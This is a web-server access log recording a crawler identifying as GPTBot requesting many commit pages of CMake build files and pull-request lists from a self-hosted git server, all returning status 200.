git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13731] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:18:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:18:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16064] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15126] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:18:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:18:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:18:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24301] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:18:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10957] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:18:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11219] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11221] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/dummy.cpp" +[17/Feb/2026:18:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11433] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:18:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=all&type=all" +[17/Feb/2026:18:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11612] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11612] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 